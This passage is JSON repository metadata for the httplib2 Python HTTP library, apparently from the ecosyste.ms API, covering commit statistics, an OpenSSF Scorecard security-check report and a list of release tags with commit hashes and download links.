":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.